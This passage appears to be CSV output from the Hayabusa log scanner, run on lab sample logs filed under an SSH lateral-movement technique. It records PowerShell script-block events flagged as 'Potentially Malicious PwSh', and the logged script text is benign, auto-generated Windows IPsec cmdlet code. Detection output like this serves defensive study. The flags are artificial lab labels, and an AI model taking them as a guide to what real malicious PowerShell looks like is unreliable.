'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name 
= 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeli",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } 
catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] 
[switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { 
[object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } 
catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeli",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ne=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, 